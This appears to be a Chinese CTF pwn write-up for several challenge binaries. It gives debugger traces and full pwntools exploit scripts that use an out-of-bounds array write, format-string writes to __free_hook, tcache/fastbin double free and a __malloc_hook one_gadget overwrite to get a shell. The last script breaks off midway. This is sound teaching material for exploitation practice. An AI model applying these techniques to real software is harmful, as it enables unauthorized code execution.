初始化阶段程序提供了3次输入:“data”,“nodes”,“edges”

分别为:数据数量,结点数量,权边数量

接着以“[from] [to] [distant]”的形式输入:“a”,“b”,“w”,进入函数“add”

输入“start”,进入函数“spfa”完成计算,最后输入任意值查看计算结果

入侵思路

首先程序有backdoor:(偏移地址为:0x16A5)

为了可以使用backdoor,需要栈溢出并且泄露“pro_base”

这里可以泄露“pro_base”:输入的“start”可以超过“dist”的范围(数组越位)

1
2
3
4
pwndbg> search -s *********************
[anon_55b6cc9c0] 0x55b6cc9c3730 0x2a2a2a2a2a2a2a2a ('********')
[anon_55b6cc9c0] 0x55b6cc9c3745 0x2a2a2a2a2a2a2a2a ('********')
[anon_55b6cc9c0] 0x55b6cc9c375a 0x2a2a2a2a2a2a2a2a ('********')
1
2
3
4
pwndbg> x/20xg 0x55b6cc9c3730-16
0x55b6cc9c3720 <dist>: 0x2a2a2a2a2a2a2a2a 0x0000000000000000
0x55b6cc9c3730 <dist+16>: 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a
0x55b6cc9c3740 <dist+32>: 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a

看看“dist”的上下都有什么:(“pro_base”和“libc_base”都可以获取了)

1
2
3
4
5
6
7
8
9
10
pwndbg> 
0x55b6cc9bef80 <system@got.plt>: 0x00007fc38ddcc410 0x00007fc38e02cd70
0x55b6cc9bef90 <_Znwm@got.plt>: 0x00007fc38e02eb20 0x00007fc38dea9b00
0x55b6cc9befa0 <__isoc99_scanf@got.plt>: 0x00007fc38dddd230 0x00007fc38de05c50 # target
0x55b6cc9befb0 <__cxa_rethrow@got.plt>: 0x00007fc38e02e6b0 0x00007fc38ddfe5a0
0x55b6cc9befc0 <memmove@got.plt>: 0x00007fc38df05670 0x00007fc38e02d3f0
0x55b6cc9befd0 <_Unwind_Resume@got.plt>: 0x00007fc38df7a480 0x00007fc38ddc1090
0x55b6cc9befe0: 0x0000000000000000 0x00007fc38dd9dfc0
0x55b6cc9beff0: 0x0000000000000000 0x0000000000000000
0x55b6cc9bf000: 0x0000000000000000 0x000055b6cc9bf008 # target
1
2
3
4
5
In [11]: 0x55b6cc9bf000+0x8-0x55b6cc9c3720
Out[11]: -18200

In [12]: 18200//8
Out[12]: 2275

计算“pro_base”:

1
2
3
4
5
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x55b6cc9b8000 0x55b6cc9b9000 r--p 1000 0 /home/ywhkkx/桌面/spfa
0x55b6cc9b9000 0x55b6cc9bc000 r-xp 3000 1000 /home/ywhkkx/桌面/spfa
0x55b6cc9bc000 0x55b6cc9be000 r--p 2000 4000 /home/ywhkkx/桌面/spfa
1
2
3
4
5
In [15]: 0x000055b6cc9bf008-0x55b6cc9b8000
Out[15]: 28680

In [16]: hex(28680)
Out[16]: '0x7008'

用同样的方法可以获取“libc_base”:

1
2
3
4
pwndbg> x/20xg 0x557a3add5720
0x557a3add5720 <dist>: 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a
0x557a3add5730 <dist+16>: 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a
0x557a3add5740 <dist+32>: 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a
1
2
3
4
5
pwndbg> telescope 0x557a3add0fa0
00:00000x557a3add0fa0 (__isoc99_scanf@got.plt) —▸ 0x7efc1a7ee230 (__isoc99_scanf) ◂— endbr64 // target
01:00080x557a3add0fa8 (setbuf@got.plt) —▸ 0x7efc1a816c50 (setbuf) ◂— endbr64
02:00100x557a3add0fb0 (__cxa_rethrow@got.plt) —▸ 0x7efc1aa3f6b0 (__cxa_rethrow) ◂— endbr64
03:00180x557a3add0fb8 (puts@got.plt) —▸ 0x7efc1a80f5a0 (puts) ◂— endbr64
1
2
3
4
0x7efc1a788000     0x7efc1a7ad000 r--p    25000 0      /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7efc1a7ad000 0x7efc1a925000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7efc1a925000 0x7efc1a96f000 r--p 4a000 19d000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7efc1a96f000 0x7efc1a970000 ---p 1000 1e7000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
1
2
3
4
5
In [21]: (0x557a3add0fa0-0x557a3add5720)//8
Out[21]: -2288

In [23]: hex(0x7efc1a788000-0x7efc1a7ee230)
Out[23]: '-0x66230'

获取了“libc_base”和“pro_base”,接下来就要考虑怎么执行 backdoor

spfa 结束后:返回地址就会被写成该边的 distant 字段的值

输入“a”,“b”,“w”后,三者在 spfa 中进行计算:“b”(“to”)中会被写入“w”(“distant ”)

所以只要把“b”写为“strlen_libc_got”,把“w”写为“backdoor”就好了

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import*

p=process('./spfa')
elf=ELF('./spfa')
libc=ELF('./libc-2.31.so')
context(log_level='debug')

#gdb.attach(p)

p.sendlineafter('how many datas?\n','4')
p.sendlineafter('how many nodes?\n','1')
p.sendlineafter('how many edges?\n','1')
p.sendlineafter('format\n','1 1 1')
p.sendlineafter('you want to start from which node?\n','1')
p.sendlineafter('which path you are interested','-2275')

p.recvuntil('the length of the shortest path is ')
leak_addr=eval(p.recvuntil('\n')[:-1])
pro_base=leak_addr-0x7008
success('leak_addr >> '+hex(leak_addr))
success('pro_base >> '+hex(pro_base))

p.sendlineafter('how many nodes?\n','1')
p.sendlineafter('how many edges?\n','1')
p.sendlineafter('format\n','1 1 1')
p.sendlineafter('you want to start from which node?\n','1')
p.sendlineafter('which path you are interested','-2288')

p.recvuntil('the length of the shortest path is ')
leak_addr=eval(p.recvuntil('\n')[:-1])
libc_base=leak_addr-0x66230
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

strlen_libc_got = libc_base + 0x1EB0A8
dist_addr = pro_base + 0xb720
backdoor = pro_base + 0x16A5

p.recvuntil('how many nodes?\n>> ')
p.sendline('1')
p.recvuntil('how many edges?\n>> ')
p.sendline('1')
p.recvuntil('format\n')
p.sendline('1')
p.sendline(str((strlen_libc_got - dist_addr) // 8))
p.sendline(str(backdoor))

p.recvuntil('you want to start from which node?\n>> ')
p.sendline('1')
p.recvuntil('>> ')
p.sendline('1')

#pause()

p.interactive()

week2

echo_server

64位,dynamically,开了NX,开了PIE,Full RELRO

程序有明显的栈溢出,还有格式化漏洞

1
2
3
void realloc(void *ptr,size_t new_size); 
//ptr:指向原来地址的指针
//new_size:新的大小(当它为‘0’时,程序执行free)

这个函数用于修改一个原先已经分配内存块的大小

入侵思路

先用格式化漏洞泄露必要数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
pwndbg> stack 50
00:0000│ rsp 0x7fffffffdd50 —▸ 0x7fffffffdd70 —▸ 0x7fffffffdd80 ◂— 0x0
01:00080x7fffffffdd58 ◂— 0x58555550e0
02:00100x7fffffffdd60 —▸ 0x5555555592a0 ◂— '-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n'
03:00180x7fffffffdd68 ◂— 0xc441dc61c3e26500
04:0020│ rbp 0x7fffffffdd70 —▸ 0x7fffffffdd80 ◂— 0x0
05:00280x7fffffffdd78 —▸ 0x5555555552c2 (main+28) ◂— mov eax, 0
06:00300x7fffffffdd80 ◂— 0x0
07:00380x7fffffffdd88 —▸ 0x7ffff7dea0b3 (__libc_start_main+243) ◂— mov edi, eax
08:00400x7fffffffdd90 —▸ 0x7ffff7ffc620 (_rtld_global_ro) ◂— 0x50d1300000000
09:00480x7fffffffdd98 —▸ 0x7fffffffde78 —▸ 0x7fffffffe1dd ◂— 0x77792f656d6f682f ('/home/yw')
0a:00500x7fffffffdda0 ◂— 0x100000000
0b:00580x7fffffffdda8 —▸ 0x5555555552a6 (main) ◂— endbr64
0c:00600x7fffffffddb0 —▸ 0x5555555552d0 (__libc_csu_init) ◂— endbr64
0d:00680x7fffffffddb8 ◂— 0x6724cc2cd88f2e17
0e:00700x7fffffffddc0 —▸ 0x5555555550e0 (_start) ◂— endbr64
0f:00780x7fffffffddc8 —▸ 0x7fffffffde70 ◂— 0x1
10:00800x7fffffffddd0 ◂— 0x0
11:00880x7fffffffddd8 ◂— 0x0
12:00900x7fffffffdde0 ◂— 0x98db33d363af2e17
13:00980x7fffffffdde8 ◂— 0x98db239198412e17
14:00a0│ 0x7fffffffddf0 ◂— 0x0
... ↓ 2 skipped
17:00b8│ 0x7fffffffde08 ◂— 0x1
18:00c0│ 0x7fffffffde10 —▸ 0x7fffffffde78 —▸ 0x7fffffffe1dd ◂— 0x77792f656d6f682f ('/home/yw')
1
2
pwndbg> n
-0x5555555592a0-0x58-0x7ffff7ed4142-0x5555555592a0-0x7ffff7dca548-0x7fffffffdd70-0x58555550e0-0x5555555592a0-0xc441dc61c3e26500-0x7fffffffdd80-0x5555555552c2-(nil)-0x7ffff7dea0b3-0x7ffff7ffc620-0x7fffffffde78

泄露数据包括“0x5555555592a0”和“0x58”,用search搜索:

1
2
3
4
5
6
pwndbg> search -t qword 0x5555555592a0
[stack] 0x7fffffffaff0 0x5555555592a0
[stack] 0x7fffffffd6d8 0x5555555592a0
[stack] 0x7fffffffdc98 0x5555555592a0
[stack] 0x7fffffffdcb0 0x5555555592a0
[stack] 0x7fffffffdd60 0x5555555592a0
1
2
3
4
pwndbg> x/20xg 0x7fffffffdc98
0x7fffffffdc98: 0x00005555555592a0 0x0000000000000058
0x7fffffffdca8: 0x00007ffff7ed4142 0x00005555555592a0
0x7fffffffdcb8: 0x00007ffff7dca548 0x0000000000000000

基本确定了格式化参数的位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
pwndbg> telescope 0x7fffffffdc98
00:00000x7fffffffdc98 —▸ 0x5555555592a0 ◂— '-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n'
01:00080x7fffffffdca0 ◂— 0x58 /* 'X' */
02:00100x7fffffffdca8 —▸ 0x7ffff7ed4142 (read+18) ◂— cmp rax, -0x1000 /* 'H=' */
03:00180x7fffffffdcb0 —▸ 0x5555555592a0 ◂— '-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n'
04:00200x7fffffffdcb8 —▸ 0x7ffff7dca548 ◂— 0x0
05:00280x7fffffffdcc0 ◂— 0x0
... ↓ 2 skipped
08:00400x7fffffffdcd8 ◂— 0x770000007c /* '|' */
09:00480x7fffffffdce0 ◂— 0x5b0000006e /* 'n' */
0a:00500x7fffffffdce8 ◂— 0x4
0b:00580x7fffffffdcf0 —▸ 0x7ffff7faeb80 (main_arena) ◂— 0x0
0c:00600x7fffffffdcf8 ◂— 0x4
0d:00680x7fffffffdd00 ◂— 0x58 /* 'X' */
0e:00700x7fffffffdd08 ◂— 0xffffffffffffffb0
0f:00780x7fffffffdd10 —▸ 0x7fffffffde70 ◂— 0x1
10:00800x7fffffffdd18 ◂— 0x0
11:00880x7fffffffdd20 ◂— 0x0
12:00900x7fffffffdd28 —▸ 0x7ffff7e602d4 (malloc+116) ◂— mov r8, rax
13:00980x7fffffffdd30 —▸ 0x5555555552d0 (__libc_csu_init) ◂— endbr64
14:00a0│ 0x7fffffffdd38 —▸ 0x7fffffffdd70 —▸ 0x7fffffffdd80 ◂— 0x0
15:00a8│ 0x7fffffffdd40 —▸ 0x5555555550e0 (_start) ◂— endbr64
16:00b0│ 0x7fffffffdd48 —▸ 0x5555555552a4 (vuln+148) ◂— jmp 0x555555555233
17:00b8│ rsp 0x7fffffffdd50 —▸ 0x7fffffffdd70 —▸ 0x7fffffffdd80 ◂— 0x0
18:00c0│ 0x7fffffffdd58 ◂— 0x58555550e0
19:00c8│ 0x7fffffffdd60 —▸ 0x5555555592a0 ◂— '-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n'
1a:00d0│ 0x7fffffffdd68 ◂— 0xc441dc61c3e26500
1b:00d8│ rbp 0x7fffffffdd70 —▸ 0x7fffffffdd80 ◂— 0x0
1c:00e00x7fffffffdd78 —▸ 0x5555555552c2 (main+28) ◂— mov eax, 0 // target
1d:00e80x7fffffffdd80 ◂— 0x0
1e:00f0│ 0x7fffffffdd88 —▸ 0x7ffff7dea0b3 (__libc_start_main+243) // target
1
2
3
4
0x555555559000     0x55555557a000 rw-p    21000 0      [heap]
0x7ffff7dc3000 0x7ffff7de8000 r--p 25000 0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7de8000 0x7ffff7f60000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7f60000 0x7ffff7faa000 r--p 4a000 19d000 /usr/lib/x86_64-linux-gnu/libc-2.31.so

解释一下:

1
-0x5555555592a0-0x58-0x7ffff7ed4142-0x5555555592a0-0x7ffff7dca548-0x7fffffffdd70-0x58555550e0-0x5555555592a0-0xc441dc61c3e26500-0x7fffffffdd80-0x5555555552c2-(nil)-0x7ffff7dea0b3-0x7ffff7ffc620-0x7fffffffde78

前6个是寄存器中存放的值(在stack中也有),后续的信息才是重点

​ // 可以直接用后面的数据来定位,这里考虑不周,搞复杂了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
p.sendlineafter('>> ','100')
payload='-%11$p-%13$p'
p.sendline(payload)

p.recvuntil('-')
main_addr=eval(p.recvuntil('-')[:-1])-28
__libc_start_main=eval(p.recvuntil('\n')[:-1])-243
success('main_addr >> '+hex(main_addr))
success('__libc_start_main >> '+hex(__libc_start_main))

pro_base=main_addr-0x12A6
libc_base=__libc_start_main-libc.sym['__libc_start_main']
success('pro_base >> '+hex(pro_base))
success('libc_base >> '+hex(libc_base))

当“realloc”的参数“new_size”为“0”时,程序会执行“free”,所以考虑打“free_hook”

通常利用格式化漏洞来 WAA 需要一个条件:在两片内存空间中,最后指向的地址相同

偏移为“6”,偏移为“10”,这两处内存空间中,最后都指向“0x7fffffffdd80”

利用格式化漏洞进行修改:

目标:修改“free_hook”为“system”

第一步,把“ __libc_start_main ”修改为“free_hook”

  • 这一步需要“偏移6”和“偏移10”的配合
  • 先修改“偏移6”为“ __libc_start_main_in_stack ”(最后1字节)
  • 对应的“偏移10”最终也会指向“ __libc_start_main_in_stack ”
  • 修改“偏移10”为“free_hook”(最后4字节)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
payload = "%{}c%6$hhn\n".format(__libc_start_main_in_stack+2)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format((__free_hook >> 16) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%6$hhn\n".format(__libc_start_main_in_stack)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

第二步,把“free_hook”写入“system”

  • 这一步需要“偏移10”和“偏移13”的配合
  • 先修改“偏移10”为“ __free_hook ”(最后6字节,第一次不用)
  • 对应的“偏移13”最终也会指向“ __free_hook ”
  • 修改“偏移13”为“system”(最后6字节)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
payload = "%{}c%13$hn\n".format((system) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook + 2 & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%13$hn\n".format((system >> 16) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook + 4 & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%13$hn\n".format((system >> 32) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
from pwn import*

p=process('./echo')
elf=ELF('./echo')
libc=ELF('./libc-2.31.so')
context(log_level='debug')

p.sendlineafter('>> ','100')
payload='-%11$p-%13$p'
p.sendline(payload)

p.recvuntil('-')
main_addr=eval(p.recvuntil('-')[:-1])-28
__libc_start_main=eval(p.recvuntil('\n')[:-1])-243
success('main_addr >> '+hex(main_addr))
success('__libc_start_main >> '+hex(__libc_start_main))

pro_base=main_addr-0x12A6
libc_base=__libc_start_main-libc.sym['__libc_start_main']
success('pro_base >> '+hex(pro_base))
success('libc_base >> '+hex(libc_base))

p.sendlineafter('>> ','100')
payload='-%6$p'
p.sendline(payload)
p.recvuntil('-')
rbp_val=eval(p.recvuntil('-')[:-1])
__free_hook = libc_base + libc.sym["__free_hook"]
__libc_start_main_in_stack = (rbp_val & 0xFF) + 0x18
success('__libc_start_main_in_stack >> '+hex(__libc_start_main_in_stack))
success("__free_hook: " + hex(__free_hook))

payload = "%{}c%6$hhn\n".format(__libc_start_main_in_stack+2)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format((__free_hook >> 16) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%6$hhn\n".format(__libc_start_main_in_stack)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

system=libc_base+libc.sym['system']
success("system: " + hex(system))

payload = "%{}c%13$hn\n".format((system) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook + 2 & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%13$hn\n".format((system >> 16) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%10$hn\n".format(__free_hook + 4 & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "%{}c%13$hn\n".format((system >> 32) & 0xFFFF)
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)

payload = "/bin/sh\x00"
p.recvuntil("length:\n>> ")
p.sendline("100")
p.send(payload)
p.recvuntil("length:\n>> ")
p.sendline("0")

p.interactive()

oldfashion_note

64位,dynamically,全开

十分简单的堆操作

入侵思路

“free模块”中没有置空指针,有 UAF 和 Double free 漏洞

因为程序的libc版本过高,在 Tcache 中的 Double free 有检查,所以先在 fastbin 中进行 Double free

先搭好框架:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def show(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))

def farewell():
p.sendlineafter('>> ','4')

Tcache 的 leak 需要先把 Tcachebin 填满,接下来释放的“chunk->size”必须大于“0x80”(不在fastbin中),那么它就会进入 Unsortedbin ,可以打 Unsortedbin leak

先申请9个chunk:(7个填Tcachebin,1个leak,1个防止和合并Top chunk)

1
2
3
4
5
6
7
8
9
10
11
12
for i in range (9):
add(i,0x100,'aaaa')

for i in range (7):
delete(i)

delete(7)
show(7)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x1ebbe0
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

“chunk8”进入 Unsortedbin

1
2
tcachebins
0x110 [ 7]: 0x560a87ba7900 —▸ 0x560a87ba77f0 —▸ 0x560a87ba76e0 —▸ 0x560a87ba75d0 —▸ 0x560a87ba74c0 —▸ 0x560a87ba73b0 —▸ 0x560a87ba72a0 ◂— 0x0
1
2
3
4
5
6
7
    0x55d06da11000     0x55d06da32000 rw-p    21000 0      [heap]
0x7f61ab950000 0x7f61ab975000 r--p 25000 0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7f61ab975000 0x7f61abaed000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7f61abaed000 0x7f61abb37000 r--p 4a000 19d000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
---------------------------------------------------------------------------
In [2]: hex(0x7f61abb3bbe0-0x7f61ab950000)
Out[2]: '0x1ebbe0'

再申请10个chunk:(7个填Tcachebin,2个Double free,1个防止和合并Top chunk)

1
2
3
4
5
6
7
8
9
for i in range (9):
add(i,0x50,'aaaa')
add(9,0x50,'/bin/sh\x00')
for i in range (7):
delete(i)

delete(7)
delete(8)
delete(7)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
tcachebins
0x60 [ 7]: 0x55a23e26ddb0 —▸ 0x55a23e26dd50 —▸ 0x55a23e26dcf0 —▸ 0x55a23e26dc90 —▸ 0x55a23e26dc30 —▸ 0x55a23e26da70 —▸ 0x55a23e26da10 ◂— 0x0
0x110 [ 7]: 0x55a23e26d900 —▸ 0x55a23e26d7f0 —▸ 0x55a23e26d6e0 —▸ 0x55a23e26d5d0 —▸ 0x55a23e26d4c0 —▸ 0x55a23e26d3b0 —▸ 0x55a23e26d2a0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x55a23e26de00 —▸ 0x55a23e26de60 ◂— 0x55a23e26de00
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x50: 0x55a23e26dac0 —▸ 0x7f8bcb966c20 (main_arena+160) ◂— 0x55a23e26dac0

最后把“free_hook”中写入“system”就好了(注意“/bin/sh”在第十个chunk中,不要覆盖了)

1
2
3
4
5
6
7
for i in range (7):
add(i,0x50,'aaaa') # 把tcachebin中的chunk申请出来

add(10,0x50,p64(free_hook))
add(11,0x50,p64(0))
add(12,0x50,p64(0))
add(13,0x50,p64(system_libc))

“add(10,0x50,p64(free_hook))”执行后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> bins
tcachebins
0x60 [ 3]: 0x55bf1a900e70 —▸ 0x55bf1a900e10 —▸ 0x7fa9dafa3b28 (__free_hook) ◂— 0x0
0x110 [ 7]: 0x55bf1a900900 —▸ 0x55bf1a9007f0 —▸ 0x55bf1a9006e0 —▸ 0x55bf1a9005d0 —▸ 0x55bf1a9004c0 —▸ 0x55bf1a9003b0 —▸ 0x55bf1a9002a0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x50: 0x55bf1a900ac0 —▸ 0x7fa9dafa0c20 (main_arena+160) ◂— 0x55bf1a900ac0

“chunk8”和“chunk10”指向同一片内存,“add(10,0x50,p64(free_hook))”执行时,会把fastbin中的chunk写入tcachebin,然后在“chunk8->next”中写入“free_hook”(“chunk8”脱链)

最后申请“chunk10”时,会申请到“free_hook”

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import*

p=process('./note')
elf=ELF('./note')
libc=ELF('./libc-2.31.so')

#gdb.attach(p)

def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendlineafter('content?\n>> ',content)

def show(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))

def farewell():
p.sendlineafter('>> ','4')

for i in range (9):
add(i,0x100,'aaaa')
for i in range (7):
delete(i)

delete(7)
show(7)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x1ebbe0
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

system_libc=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
success('system_libc >> '+hex(system_libc))
success('free_hook >> '+hex(free_hook))

for i in range (9):
add(i,0x50,'aaaa')
add(9,0x50,'/bin/sh\x00')
for i in range (7):
delete(i)

delete(7)
delete(8)
delete(7)

for i in range (7):
add(i,0x50,'aaaa')

add(10,0x50,p64(free_hook))
add(11,0x50,p64(free_hook))
add(12,0x50,p64(free_hook))
add(13,0x50,p64(system_libc))

delete(9)

#pause()

p.interactive()

PS:在 tcachebin 里面的 double free 少一个malloc检查,轻松了不少

week3

elder_note

64位,dynamically,全开

程序提供了4个选项

代码分析

“free模块”没有置空指针,可以打UAF,Double free

入侵思路

打 Double free,先搭好模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def show(index,content):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))
p.sendline(content)

def farewell():
p.sendlineafter('>> ','4')

先打 Unsortedbin leak:

1
2
3
4
5
6
7
8
add(0,0x80,'aaaa')
add(1,0x80,'aaaa')
delete(0)
show(0)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

再打 Double free:

1
2
3
4
5
6
7
8
add(0,0x30,'aaaa')
add(2,0x60,'bbbb')
add(3,0x60,'bbbb')
add(4,0x60,'bbbb')

delete(2)
delete(3)
delete(2)
1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> bins
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x559541c25120 —▸ 0x559541c25190 ◂— 0x559541c25120
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x50: 0x559541c25040 —▸ 0x7fe5b60c3bb8 (main_arena+152) ◂— 0x559541c25040

最后打“malloc_hook”

我们的目标是在“malloc_hook”中写入“one_gadget”,但是不能直接 fastbin attack(因为malloc会对 fastbin chunk 的size位进行检查,free chunk 的size位必须对应相等)

这里用了一个小技巧:(拆分现成的地址来构造数据,通常为“\x7f”)

1
2
3
4
5
6
7
8
pwndbg> x/20xw 0x7f95cd91baed+0x23
0x7f95cd91bb10 <__malloc_hook>: 0x00000000 0x00000000 0x00000000 0x00000000
0x7f95cd91bb20 <main_arena>: 0x00000000 0x00000000 0x00000000 0x00000000
--------------------------------------------------------------
pwndbg> x/20xw 0x7f95cd91baed
0x7f95cd91baed <_IO_wide_data_0+301>: 0x60000000 0x95cd91a2 0x0000007f 0x00000000
0x7f95cd91bafd: 0xa0000000 0x95cd5dce 0x7000007f 0x95cd5dca
0x7f95cd91bb0d <__realloc_hook+5>: 0x0000007f 0x00000000 0x00000000 0x00000000

在“__malloc_hook”上方“0x23”的位置可以分割出“\x7f”

1
2
3
4
5
6
7
8
9
10
11
12
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
realloc = libc_base + libc.sym["__libc_realloc"]
system_libc=libc_base+libc.sym['system']
one_gadget = libc_base + 0x4527a
success('one_gadget >> '+hex(one_gadget))

add(0,0x60,p64(malloc_hook - 0x23))
add(0,0x60,p64(malloc_hook - 0x23))
add(0,0x60,p64(malloc_hook - 0x23))

add(0, 0x60, 'c' * 0xb + p64(one_gadget) + p64(realloc + 0x10))

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *

p=process("./note")
elf=ELF("./note")
libc = ELF("./libc-2.23.so")

def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def show(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))

def farewell():
p.sendlineafter('>> ','4')


add(0,0x80,'aaaa')
add(1,0x80,'aaaa')
delete(0)
show(0)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

add(0,0x30,'aaaa')
add(2,0x60,'bbbb')
add(3,0x60,'bbbb')
add(4,0x60,'bbbb')

delete(2)
delete(3)
delete(2)

free_hook=libc_base+libc.sym['__free_hook']
